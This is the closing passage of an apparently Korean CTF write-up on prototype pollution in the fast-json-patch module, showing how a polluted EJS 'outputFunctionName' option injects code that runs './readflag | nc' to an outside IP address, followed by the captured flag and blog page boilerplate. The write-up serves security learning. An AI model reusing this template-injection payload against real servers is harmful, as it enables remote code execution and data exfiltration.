<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (opts.outputFunctionName) &#123;</span><br><span class="line">  prepended += <span class="string">&#x27;  var _; process.mainModule.require(&#x27;</span>child_process<span class="string">&#x27;).execSync(&#x27;</span>./readflag | nc <span class="number">141.164</span><span class="number">.52</span><span class="number">.207</span> <span class="number">80</span><span class="string">&#x27;);// = __append;&#x27;</span> + <span class="string">&#x27;\n&#x27;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>그럼 <code>compile()</code> 메서드 내부에서는 위와 같이 완성이 되어 js 코드가 실행이 될 것이다.</p>
<p><img src="https://github.com/wjddnjs33/image/blob/main/prototype/flag.png?raw=true"></p>
<p>그래서 index 페이지로 접속을 해보니 <code>ejs.renderFile()</code> 메서드가 실행이 되어 RCE가 발생해 플래그를 얻을 수 있었다.</p>
<blockquote>
<p>FLAG : CTF-BR{d0nt_miX_pr0totyPe_pol1ution_w1th_a_t3mplat3_3ng1nE!}</p>
</blockquote>
<hr>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/categories/">Category</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#TR-DL"><span class="toc-number">1.</span> <span class="toc-text">TR;DL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-Introduce"><span class="toc-number">2.</span> <span class="toc-text">Analysis : Introduce</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-applyPatch"><span class="toc-number">3.</span> <span class="toc-text">Analysis : applyPatch()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analsys-applyOperation"><span class="toc-number">4.</span> <span class="toc-text">Analsys : applyOperation()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-objOps"><span class="toc-number">5.</span> <span class="toc-text">Analysis : objOps</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploit-Web-pwn2win-CTF-2021-152-pts"><span class="toc-number">6.</span> <span class="toc-text">Exploit (Web) pwn2win CTF 2021 [152 pts]</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&text=Prototype Pollution in fast-json-patch module"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&title=Prototype Pollution in fast-json-patch module"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&is_video=false&description=Prototype Pollution in fast-json-patch module"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Prototype Pollution in fast-json-patch module&body=Check out this article: http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&title=Prototype Pollution in fast-json-patch module"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&title=Prototype Pollution in fast-json-patch module"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&title=Prototype Pollution in fast-json-patch module"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&title=Prototype Pollution in fast-json-patch module"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&name=Prototype Pollution in fast-json-patch module&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&t=Prototype Pollution in fast-json-patch module"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2021
    Jeongwon Jo
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/categories/">Category</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'https-pocas-kr';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>


</body>
</html>
